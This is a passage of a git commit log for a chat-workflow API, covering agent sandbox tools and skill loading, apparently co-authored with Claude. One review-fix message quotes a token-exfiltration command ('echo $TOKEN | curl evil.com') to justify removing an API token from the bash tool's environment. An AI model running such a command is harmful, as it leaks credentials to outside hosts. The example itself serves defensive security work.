Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 21, 2026
* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth

Two production-build issues surfaced by Vercel that local pnpm test +
tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's
errors were all in __tests__ unrelated to this PR).

1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }`
   narrowing wasn't kicking in under Next.js's strict TS plugin.
   Switched to `if ("error" in result)` (in-operator narrowing) which
   reliably discriminates the union members regardless of literal-type
   inference quirks.

2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...)
   .update(...).eq(...)` + reassignment in a `for` loop (`.is()` /
   `.eq()` per where entry) caused "type instantiation is excessively
   deep" — Supabase's PostgrestFilterBuilder is heavily generic and the
   reassignment kept expanding the type. Rewrote as: split where map
   into equality matches (one `.match(obj)` call) + nullable columns
   (reduced with `.is(col, null)` typed back to the original builder).

Both bugs were behavior-neutral — the function shape and contract are
unchanged. 37/37 tests in touched files green; full suite 2955/2955;
lint clean; `pnpm build` now succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583)

* feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim)

Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it
through the workflow via streamText's `experimental_context`. Proves
the entire tool-execution machinery works end-to-end. The remaining 10
tools (read, write, grep, glob, todo, task, ask_user_question, skill,
fetch + utils) port in a follow-up; this PR's scope was deliberately
held to one tool so the wire-up is reviewable in isolation.

New files:
- lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard,
  getSandbox() that reconnects via connectVercel(state) per call.
- lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN,
  RECOUP_ORG_ID } env builder from context.
- lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts
  adapted to api's Sandbox interface. Injects recoup env on foreground
  execs only (detached processes outlive the prompt → no token).
- lib/agent/buildAgentTools.ts — factory returning the agent's tool
  record. Adding the remaining tools is a one-line append to this map.

Wire-up:
- runAgentStep now accepts `agentContext`, passes into streamText as
  experimental_context, and uses streamText's internal multi-step loop
  (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop
  in runAgentWorkflow needed.
- handleChatWorkflowStream derives recoupOrgId from session.clone_url
  via extractOrgId, builds AgentContext with session.sandbox_state +
  validated.authToken, passes to start(workflow).

Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory
+ 3 workflow file updates picked up by existing tests). Full suite
2978/2978 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure

Sweetman KISS/SRP feedback (4 comments):
- Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's
  default stop condition handles tool-call iteration without an
  arbitrary cap that could silently truncate the only workflow turn.
- Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from
  bashTool. All model-issued commands are trusted in this PR — host-
  side gating belongs at the route/UI layer if it ever returns.
- Removed `needsApproval` from bashTool entirely (subsumes cubic P1
  about the broken override ordering — the gate itself is gone).
- Split `lib/agent/tools/utils.ts` into per-function files:
  - `AgentContext.ts` — type
  - `isAgentContext.ts` — guard
  - `getSandbox.ts` — sandbox reconnection
  No catch-all utils file.

Cubic feedback:
- **P0**: Removed `recoupAccessToken` from AgentContext + handler +
  buildRecoupExecEnv. Handing the long-lived api key to bash would let
  any model-issued command exfiltrate it via env (`echo $TOKEN | curl
  evil.com`). Slim PR 4 has no actual consumer for the token — only
  the future `skill` tool needs it. Proper short-lived token minting
  will land alongside that port.
- **P2** (`isAgentContext` too weak): tightened the guard to validate
  sandbox.state is a non-null object AND sandbox.workingDirectory is a
  non-empty string. Earlier guard returned true for `{ sandbox: {} }`,
  letting tools later crash on undefined fields.
- P1 + P2 about stopWhen / needsApproval: resolved by sweetman's
  deletions above.
- P2 (test file >100 lines): dismissed — same as PR 3 review. The repo
  has no enforced max-lines rule; existing tests routinely exceed 700
  lines.

Tests updated for the new shape. 25 tests in touched files green
(8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv +
2 factory). Full suite 2980/2980 pass; lint clean; production build
succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow

Per discussion on PR #583. Restoring the streamText stop condition so
the workflow agent gets the model wrap-up turn after a tool call (model
→ tool → tool-result → model → text response), instead of stopping at
streamText's default `stepCountIs(1)` after the first tool call.

DRY by sharing one constant between the two chat endpoints:

- New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts.
  Inherits the value that /api/chat already uses (originally hardcoded
  in getGeneralAgent.ts:55) — high enough that normal flows never hit
  the cap but bounds runaway loops for cost / replay safety.
- lib/agents/generalAgent/getGeneralAgent.ts: imports the constant
  instead of constructing stepCountIs(111) inline.
- app/lib/workflows/runAgentStep.ts: imports the constant, passes to
  streamText as `stopWhen`.

Single-shot agents (createCompactAgent, createContentPromptAgent,
createEmailReplyAgent) intentionally keep their local `stepCountIs(1)`
— they're not in the multi-step chat family.

Full suite 2980/2980 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585)

* feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5)

Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools
from open-agents/packages/agent/tools/. Each is a direct port adapted
to api's Sandbox interface, registered in buildAgentTools, and ready
for the agent to invoke through the existing experimental_context
plumbing.

New tool files (one tool per file, per sweetman SRP):
- readFileTool.ts — read with 1-indexed offset/limit, numbered output
- writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile
- editFileTool.ts — exact-string replace, ambiguous-match rejection
- grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200
- globTool.ts — find -printf with mtime sort, GNU/BSD-compatible
- todoWriteTool.ts — stateless planning surface; echoes the list back
- webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB

New helpers (utilities used by multiple tools):
- shellEscape.ts — `'` → `'\''` dance
- toDisplayPath.ts — absolute → relative-when-inside-workdir display path

buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite
tools (`task`, `ask_user_question`, `skill`) need subagent context /
UI rendering / skill discovery infrastructure not in api today and
land in a follow-up PR.

Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite
3014/3014; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers)

Per PR 585 review question — most tools were defined as `() => tool({...})`
factories while two (todoWriteTool, webFetchTool) were direct values.
The split was a vestigial copy from open-agents where the factory
pattern only made sense for tools that took options (originally bash's
ToolOptions, which sweetman had me remove in PR 4 review).

AI SDK's `tool()` helper returns a plain value with no per-call state,
so the factory wrappers added nothing. Harmonized to direct-value
exports across all 8 tools:

- bashTool, readFileTool, writeFileTool, editFileTool, grepTool,
  globTool: dropped the `() =>` wrapper.
- buildAgentTools.ts: dropped the matching `()` calls.
- 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly).

Full suite 3014/3014 pass; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587)

* feat(chat-workflow): port skill discovery + skillTool (PR 6, slim)

Ports the `skill` composite tool from open-agents along with the skill
discovery layer it depends on. The handler now connects to the sandbox
before workflow start, scans `${workingDirectory}/skills/` for project-
level skills, and threads the catalog into the workflow via
`AgentContext.skills`. The `skill` tool is registered in
`buildAgentTools` only when the catalog is non-empty — so models in
sandboxes without skills never see the tool.

New skills layer (lib/skills/):
- skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema,
  frontmatterToOptions (Zod schema + camelCase normalization)
- parseSkillFrontmatter.ts — hand-rolled YAML subset parser
  (key:value, quoted strings, booleans; preserves colons in URLs)
- extractSkillBody.ts — strip frontmatter, return body
- substituteArguments.ts — $ARGUMENTS replacement
- injectSkillDirectory.ts — prepend `Skill directory: <path>`
- discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name,
  drop names that shadow built-in /model /resume /new
- getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]`
  only. Global skills (~/.skills) port later alongside short-lived
  token minting

New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup,
respects `disable-model-invocation`, surfaces available-skills list
on unknown name. Loads SKILL.md content, applies extractSkillBody →
injectSkillDirectory → substituteArguments, returns to the model.

Wire-up:
- AgentContext gains `skills?: SkillMetadata[]`
- buildAgentTools accepts `{ skills }`, registers skill tool when
  non-empty
- runAgentStep passes `agentContext.skills` to buildAgentTools
- handleChatWorkflowStream connects sandbox + discoverSkills before
  start(workflow); empty catalog on discovery failure (best-effort,
  never blocks the request)

Slim scope decisions:
- Project skills only (no global ~/.skills/ scan yet)
- No short-lived token minting; the recoup-api skill would still
  load + return content, but its curl examples wouldn't authenticate
  without ad-hoc credentials. Token minting becomes a separate PR
  where it can be designed properly (Privy JWT vs server-minted JWT
  scoped to accountId + sandbox session).

Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2
injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills +
7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass;
lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* fix(skills): match open-agents 3-path scan (was scanning the wrong dir)

The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/
— a path that doesn't exist in real recoupable sandboxes. The actual
layout (mirrored from open-agents/apps/web/lib/skills/directories.ts):

  - \${workingDirectory}/.claude/skills/   (project, claude-style)
  - \${workingDirectory}/.agents/skills/   (project, agents-style)
  - \${HOME}/.agents/skills/               (global; populated at
                                           provisioning by
                                           installSessionGlobalSkills)

Also drops the earlier deferral comment: global skills load fine
WITHOUT short-lived token minting. The skill tool returns SKILL.md
content to the model; only the curl examples *inside* SKILL.md need
auth credentials, and those can be supplied ad-hoc until proper
token minting lands.

Changes:
- getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory
  to find the sandbox's actual $HOME — defaults to /root)
- exports the two sub-functions (getProjectSkillDirectories +
  getGlobalSkillsDirectory) so they're individually testable
- Handler awaits the async path resolution
- New test suite covers all 3 paths + $HOME variants

Caught by sweetman pointing out that this same repo (org-rostrum-pacific)
DOES show skills in open-agents — proving the slim deferral was wrong.

Full suite 3053/3053; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback)

Two changes per user direction:

1. **YAGNI: drop project-skill directory scanning.** All skills are
   provisioned globally via `installSessionGlobalSkills` at sandbox
   startup — org repos do NOT bundle their own skill directories.
   getSandboxSkillDirectories now returns just the single global
   path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories
   and the PROJECT_SKILL_BASE_FOLDERS array.

2. **SRP: extract getSkills into its own file.** Previously inline in
   skillTool.ts (per sweetman comment on PR 587). Now lives at
   lib/skills/getSkills.ts with its own tests. Future skill-aware
   consumers (e.g. system-prompt builders) share the same accessor
   instead of duplicating the context-cast.

Verified live on preview against \`recoupable/org-rostrum-pacific-...\`
BEFORE this commit:
  - Sandbox provisioning installs 2 globals at
    /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace)
  - Agent invoked \`skill({ skill: "recoup-api" })\` successfully,
    received 11,173 chars of SKILL.md content with the correct
    "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api"
    header

Full suite 3055/3055; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory

Per sweetman PR review (comments r3283710486 and r3283762023). Each
helper now lives in its own file with its own focused test suite:

- lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts
  - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null
    when neither exists)
- lib/skills/getGlobalSkillsDirectory.ts — was inlined in
  getSandboxSkillDirectories.ts
  - 2 new unit tests (standard path, trailing-slash tolerance)

discoverSkills now imports findSkillFile. getSandboxSkillDirectories
imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories
test loses its inline getGlobalSkillsDirectory cases (those moved to
the dedicated test file).

Full suite passes; lint clean; production build succeeds.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
sweetmantech added a commit to recoupable/api that referenced this pull request May 21, 2026
* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579)

* feat(chat-workflow): add POST /api/chat/workflow route stub

Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed
chat endpoint documented in recoupable/docs#221. The stub validates
the full request contract (auth, body, session/chat ownership,
sandbox active) and returns a hardcoded UIMessage stream with an
x-workflow-run-id: stub-<uuid> header — so the chat-side team can
integrate against the real response shape today while the workflow
itself is being ported from open-agents in follow-up PRs.

Files:
- app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS
- lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat
  ownership → sandbox check → stub UIMessage stream
- lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI
  ChatWorkflowRequest (messages, chatId, sessionId, optional
  context.contextLimit)

Status codes implemented (match contract docs):
- 200 — UIMessage stream + x-workflow-run-id header
- 400 — invalid JSON / invalid body / "Sandbox not initialized"
- 401 — validateAuthContext passthrough
- 403 — session not owned by API key's account
- 404 — session or chat not found (incl. chat under different session)
- 500 — selectSessions returned null (DB error)

409 (duplicate workflow run for chat) is deferred to the wire-up PR
that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet.

Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — SRP/DRY cleanup

Two review fixes per PR feedback:

1. SRP/DRY — drop the local errorResponse helper from
   handleChatWorkflowStream.ts; use the shared
   lib/networking/errorResponse and lib/zod/validationErrorResponse
   helpers instead.

2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts
   into the validator. Rename validateChatWorkflowBody → validateChatWorkflow
   so it accepts a full NextRequest (like the existing validateChatRequest)
   and returns an auth-augmented body (accountId/orgId/authToken). The
   handler now opens with a single `validateChatWorkflow(request)` call.

Tests reshaped to match new seams:
- Validator test mocks validateAuthContext only
- Handler test mocks validateChatWorkflow (the new seam)
- Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed
  into a single "validator short-circuit passes through" test — both are
  now the validator's responsibility, not the handler's

22/22 new tests green; full suite 2900/2900 pass; lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* chore: revert unrelated local changes accidentally swept into PR

Previous commit (9262f65) used `git add -A` which picked up local
Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak
that aren't part of this PR's scope. Removing them now so the PR
diff stays scoped to the chat-workflow refactor.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

---------

Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581)

* feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow

Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow
agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones
(`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired —
the workflow runs streamText with the gateway model + Recoup custom
instructions only. Sandbox tool surface comes in a follow-up PR.

What's now plumbed end-to-end:
- validateChatWorkflow → session+chat ownership → sandbox active → reconcile
  existing active_stream_id (resume / 409 / fall-through) → refresh
  lifecycle activity → fire-and-forget persist user message → start
  runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) →
  return run.getReadable() with x-workflow-run-id header

New helpers (Supabase):
- compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id
- touchChat — bump chats.updated_at
- updateChat — generic partial update mirroring updateSession's shape
- createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert
- isFirstChatMessage — true iff exactly one row exists matching messageId

New helpers (chat/recoupable):
- extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased)
- agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt
- persistLatestUserMessage — fire-and-forget user msg + title-from-first-80
- reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop

New workflow files:
- app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper
- app/workflows/runAgentStep.ts — `"use step"`, single streamText turn

Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3
createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest +
6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored).
Full suite: 2946/2946 pass, lint clean.

Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools).
Without tools, `finishReason` is always "stop" after one turn — the
runAgentWorkflow loop shape is in place but only iterates once today.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): address PR review — structural + P1/P2 fixes

Sweetman structural feedback (KISS / OCP):
- Move workflow files: app/workflows/runAgent{Workflow,Step}.ts →
  app/lib/workflows/runAgent{Workflow,Step}.ts
- Generic Supabase helpers + domain wrappers:
  - Generic `updateChat({filter, updates})` with optional CAS predicate
    on active_stream_id. Subsumes compareAndSetChatActiveStreamId and
    touchChat (both deleted).
  - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces
    domain-specific isFirstChatMessage. The "is earliest?" check now
    lives in persistLatestUserMessage where it belongs.
  - Rename createChatMessageIfNotExists → `upsertChatMessage` with a
    discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so
    callers can tell duplicates from DB errors.
- Extract resume-stream block from handler into `maybeResumeChatStream.ts`
  (OCP — handler stays small, resume logic grows independently).

cubic P1 fixes:
- CAS-before-start: handler now claims `active_stream_id` with a
  `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the
  race where two requests could both bill the model before one lost the
  CAS. After start(), promotes the placeholder to the real run id.
- updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}`
  so callers distinguish "race lost" (rowsUpdated:0) from DB errors.
- reconcileExistingActiveStream: bare try/catch on getRun no longer
  clears stale active_stream_id on transient workflow API failures —
  we treat any uncertainty as conflict. Failed CAS-clear on a completed
  run also returns conflict (rather than possibly falling through to
  ready on a DB read error).
- await getRun(runId).cancel() in handler — previously synchronous +
  unawaited cancellation could escape the try/catch.

cubic P2 fixes:
- updateChat updates parameter narrowed to `ChatMutableFields` (excludes
  id, session_id, created_at).
- persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH
  exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to
  body-budget = max - suffix.
- runAgentStep: acquire writer once, release in finally. Per-chunk writer
  acquisition could leak the lock on write failure.
- runAgentWorkflow: capped at a single turn until messages threading
  lands with tool ports (PR 4). Multi-turn loop with the same input was
  unsafe — log+warn if model returns tool-calls and exit.

Tests reworked: 231 in the touched files all green; full suite 2949/2949;
lint clean.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): top-level import in reconcileExistingActiveStream

The dynamic `await import("workflow/api")` inside the function body was
a carry-over from open-agents — handleChatWorkflowStream.ts already
top-level imports `start` and `getRun` from the same package, so there's
no reason for the lib to defer. Moving to a normal top-level import for
consistency.

Also tightens the cancel-throws handler test to use the same deferred-
rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's
unhandled-rejection watcher doesn't trip on the mock setup.

Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* refactor(chat-workflow): move active_stream_id CAS out of supabase lib

Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific
predicate logic doesn't belong in the Supabase plumbing. Restructured:

- `lib/supabase/chats/updateChat.ts` now generic. The filter accepts
  `where: Partial<Tables<"chats">>` (a generic predicate that maps to
  `column = value` or `column IS NULL`) so no column name is hardcoded
  in the Supabase lib.

- `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper.
  Owns the "compare-and-set on active_stream_id" concept and returns a
  discriminated `{ok, claimed} | {ok: false, error}` result. Handler
  and reconcileExistingActiveStream both compose against this wrapper
  instead of constructing predicates inline.

- Handler + reconcile updated to use the wrapper. Tests follow.

37/37 tests in touched files pass; full suite 2955/2955; lint clean.

